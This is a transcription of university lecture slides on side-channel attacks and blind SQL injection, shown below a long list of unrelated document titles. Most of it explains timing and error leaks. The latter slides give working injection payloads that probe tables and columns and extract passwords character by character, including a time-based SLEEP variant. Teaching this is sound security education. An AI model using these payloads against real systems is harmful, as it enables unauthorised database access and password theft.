Side-channel attacks (and blind SQL injections)

Similar documents
Server-side web security (part 2 - attacks and defences)

Fast SQL blind injections in high latency networks

Automated SQL Ownage Techniques. OWASP October 30 th, The OWASP Foundation

Assessment 1 Task 3 Explain the following security risks SQL Injection Cross Site Scripting XSS Brute Force Attack/Dictionary Attack

Maximizing the speed of time based SQL injection data retrieval

CSCE 548 Building Secure Software Entity Authentication. Professor Lisa Luo Spring 2018

Encryption I. An Introduction

Locate your Advanced Tools and Applications

Lecture 7: Web hacking 3, SQL injection, Xpath injection, Server side template injection, File inclusion

TripSource: Profile Manager

How to exploit the SIP Digest Leak vulnerability

SIDE CHANNEL ATTACKS AGAINST IOS CRYPTO LIBRARIES AND MORE DR. NAJWA AARAJ HACK IN THE BOX 13 APRIL 2017

Attack on DES. Jing Li

Chapters 10 & 11 PHP AND MYSQL

Blind Sql Injection with Regular Expressions Attack

Exam Questions v8

GUI based and very easy to use, no security expertise required. Reporting in both HTML and RTF formats - Click here to view the sample report.

MANAGING LOCAL AUTHENTICATION IN WINDOWS

Create Login Form. Longflow Enterprises Ltd. Page 1

Logistics. Next week, my OH will be vs HW6 (= writing + Monad.hs) counts! You HW grade = max of 5 HWs. CAPEs!

Perslink Security. Perslink Security. Eleonora Petridou Pascal Cuylaerts. System And Network Engineering University of Amsterdam.

WebGoat Lab session overview

TWO-FACTOR AUTHENTICATION Version 1.1.0

What is Authentication? All requests for resources have to be monitored. Every request must be authenticated and authorized to use the resource.

Lecture 13: MySQL and PHP. Monday, March 26, 2018

Daniel Pittman October 17, 2011

Time Trial Racing Towards Practical Remote Timing Attacks

CONTENTS IN DETAIL INTRODUCTION 1 THE FAQS OF LIFE THE SCRIPTS EVERY PHP PROGRAMMER WANTS (OR NEEDS) TO KNOW 1 2 CONFIGURING PHP 19

Module 14: SQL Injection

TIMING-BASED ATTACKS IN WEB APPLICATIONS

Solution of Exercise Sheet 5

Web Security. Attacks on Servers 11/6/2017 1

Integrity attacks (from data to code): Malicious File upload, code execution, SQL Injection

Mysql Create User Password Hash Should Be A

PYTHIA SERVICE BY VIRGIL SECURITY WHITE PAPER

Attacks Against Websites. Tom Chothia Computer Security, Lecture 11

CTF. I-Bank. Logical Flaws in a PHP banking application. FluxReiners

Chapter 1 Protecting Financial Institutions from Brute-Force Attacks

(System) Integrity attacks System Abuse, Malicious File upload, SQL Injection

Web Database Programming

Nemesis: Preventing Web Authentication & Access Control Vulnerabilities. Michael Dalton, Christos Kozyrakis Stanford University

Computer Security 3/20/18

Talend Component tgoogledrive

Bank Infrastructure - Video - 1

Computer Security. 08. Authentication. Paul Krzyzanowski. Rutgers University. Spring 2018

CNIT 129S: Securing Web Applications. Ch 4: Mapping the Application

Deutsche Bank Global Transaction Banking. Digipass 270XH. Getting 4 Started.

User Authentication and Passwords

Web Application & Web Server Vulnerabilities Assessment Pankaj Sharma

Mike Hamburg. August 1, Abstract

Lecture 3 - Passwords and Authentication

Understanding Advanced Blind SQLI attack

2018/5. Ver BthLogon. Windows Logon Authentication using Android Device. RiBiG Inc.

Side channel attack: Power Analysis. Chujiao Ma, Z. Jerry Shi CSE, University of Connecticut

LDAP/AD v1.0 User Guide

Landlord Tutorial: Property Database

Spectre and Meltdown. Clifford Wolf q/talk

Berner Fachhochschule Haute cole spcialise bernoise Berne University of Applied Sciences 2

PASSWORDS & ENCRYPTION

IA L16 - Hands-On Lab Hands on with Instant Backup and Recovery Features of NetBackup 7.6 for VMware

10 Active Directory Misconfigurations That Lead to Total Compromise Austin, TX 201 W 5th St.

Secure Development After Security Bugs

CS/ENGRD 2110 Object-Oriented Programming and Data Structures Spring 2012 Thorsten Joachims. Lecture 10: Asymptotic Complexity and

Effective Testing for Live Applications. March, 29, 2018 Sveta Smirnova

Lecture 3 - Passwords and Authentication

This slide shows the OWASP Top 10 Web Application Security Risks of 2017, which is a list of the currently most dangerous web vulnerabilities in

Administration Manual

Web Security, Summer Term 2012

Web Security, Summer Term 2012

Web Application Security Evaluation

Configuring an Enhanced Standard Security Policy

Checklist for Testing of Web Application

Administration Manual

Chapter 3.4: Exceptions

New Password Reset for Dental Connect Provider


Beta Mobile app Testing guidelines

CompTIA Security+(2008 Edition) Exam

Outline. Login w/ Shared Secret: Variant 1. Login With Shared Secret: Variant 2. Login Only Authentication (One Way) Mutual Authentication

Key-Evolution Schemes Resilient to Space Bounded Leakage

NextMD Patient Portal Guide

Holistic Database Security

Troubleshooting. EAP-FAST Error Messages CHAPTER

Deutsche Bank Global Transaction Banking. Digipass 270/276XH. Getting 4 Started.

Using MySQL on the Winthrop Linux Systems

Architecture. Steven M. Bellovin October 31,

Open Source Digitalization Application. User s Manual

Authenticating Pervasive Devices with Human Protocols

PASS4TEST. IT Certification Guaranteed, The Easy Way! We offer free update service for one year

TripSource: Profile Manager

Ideal Security Protocol. Identify Friend or Foe (IFF) MIG in the Middle 4/2/2012

Hardware Security. A Presentation by Eli Clampett and James Carey

LiveBox Manual WEB USER FLAVIA.

CIS 5373 Systems Security

Secure web proxy resistant to probing attacks

Public Key Cryptography and RSA

Web insecurity Security strategies General security Listing of server-side risks Language specific security. Web Security.

Effective Password Hashing

Web Application Vulnerabilities: OWASP Top 10 Revisited

BCS THE CHARTERED INSTITUTE FOR IT. BCS HIGHER EDUCATION QUALIFICATIONS BCS Level 6 Professional Graduate Diploma in IT WEB ENGINEERING

Transcription:

Side-channel attacks (and blind SQL injections) Security 1 2018-19 Università Ca Foscari Venezia www.dais.unive.it/~focardi secgroup.dais.unive.it

Introduction It is often the case that applications have side effects: an observable effect reflecting the internal state If the side effect depends on a secret value we have a partial leakage If the leakage is enough to recover the secret then we have an attack 2

Necessary leakages Consider a failure in password check: 1. User enters a password 2. The system checks the password (hash) 3. If the password is incorrect the user is notified Leak: at each iteration the attacker discovers that a certain password is incorrect An attacker might bruteforce a password online Solution: slow down password check after some errors 3

Practical attacks Small search space the attack becomes fast! ATM PIN Telephone (SIM) PIN Any smartcard PIN Smartphone PIN... 5 digits PINs are just 99999! Solution: Lock device after some attempts 4

Kind of side channels Side channels can be based on Errors Time Content Size Power consumption Electromagnetic emissions... 5

Errors Example: Wrong credentials We cannot ignore the error, but we can minimize the leak by hiding what is wrong 1. if username is wrong return User does not exists 2. if password is wrong return Wrong password Solution: if either username or password is wrong return Wrong credentials 6

Time (1) Consider again the example: if either username or password is wrong return Wrong credentials The test either username or password is wrong might be faster when the username is wrong an attacker observing time could still deduce that the User does not exists! Solution: use time-safe code! 7

Time (2) Equality tests leak sensitive data: 'aaaaaaaaa' == 'aaaaaaaaa' slower than 'aaaaaaaaa' == 'aaaaaaabb' much slower than 'aaaaaaaaa' == 'baaaaaaaa' and 'aaaaaaaaa' == 'a' 8

Time (2) Attacker starts from 'axxxxxx' == '********' 'bxxxxxx' == '********' 'sxxxxxx' == '********' Slower! first * is s! Then 'saxxxxx' == '********' 'sbxxxxx' == '********'... 9

Time-safe functions For example, in PHP: bool hash_equals ( string $known_string, string $user_string ) Compares two strings using the same time whether they're equal or not. This function should be used to mitigate timing attacks; for instance, when testing crypt() password hashes. Neither PHP's == and === operators nor strcmp() perform constant time string comparisons 10

Blind SQL injection An injection that exploits a side channel to leak information: The injection queries sensitive data The result is leaked via side channel It is effective when the result of the query cannot be directly displayed 11

Possible side channels Depending of the query success, the application shows: a distinguishable message; an error; a broken page an empty page Intuitively, we get a 1-bit boolean answer Iteration might leak the whole sensitive data 12

Example Consider, for example, a password recovery service (use haxor/sqleet to login) It sends an email with a new password to users, if they are registered in the system If the user is registered the email is sent, otherwise an error message is displayed. 13

Example ctd. Suppose the query is something like: SELECT 1 FROM... WHERE...='EMAIL' If the query is successful the answer is YES otherwise the answer is NO (including when there is an error) What is the effect of ' OR 1=1 #? Makes the query succeed but does not leak any data. apart that we discover that injections are possible 14

Leaking something We can now inject the following code: ' OR (SELECT 1 FROM users LIMIT 0,1)=1 # Check if the table users exists! Notice the usage of LIMIT 0,1 to just get the first row, where 0 is the OFFSET and 1 the ROWCOUNT In our example the name of the table is people... 15

Experiment on testbed r1x@testbed ~ $ mysql -A -usqli_example -psqli_example sqli_example mysql> SELECT 1 FROM people WHERE mail='' OR (SELECT 1 FROM people LIMIT 0,1)=1; +---+ 1 +---+ 1 1... 1 1 +---+ 10 rows in set (0.00 sec) 16

Experiment on testbed We get 10 rows with value 1 (OK or not...) If we want to limit the result to one row we can add another LIMIT directive as follows: mysql> SELECT 1 FROM people WHERE mail='' OR (SELECT 1 FROM people LIMIT 0,1)=1 LIMIT 0,1; +---+ 1 +---+ 1 +---+ 1 row in set (0.00 sec) 17

Checking column name We can use MID function to check the existence of a particular column: ' OR (SELECT MID(password,1,0) FROM people LIMIT 0,1)='' # Only when password exists we get a positive result MID(password,1,0) gets the substring of length 0 from position 1 18

Leaking arbitrary data Guessing rows and columns names and data can work in simple examples Can we leak arbitrary data? ' or (SELECT MID(password,1,1) FROM people LIMIT 0,1)='a' # ' or (SELECT MID(password,1,1) FROM people LIMIT 0,1)='b' # ' or (SELECT MID(password,1,1) FROM people LIMIT 0,1)='z' # Brute forces the first character of the first password! 19

Exercises 1. Brute force the lastname of users in people 2. Improve the attack using binary search: ' or (SELECT ORD(MID(password,1,1)) FROM people LIMIT 0,1)<=ORD('a') # 3. When no error message is given it is still possible to try a totally blind injection ' or (SELECT IF((SELECT ORD(MID(password,1,1)) FROM people LIMIT 0,1)<=ORD('z'),SLEEP(0.1),NULL)) # 20

2024 © technodocbox.com Privacy Policy | Terms of Service | Feedback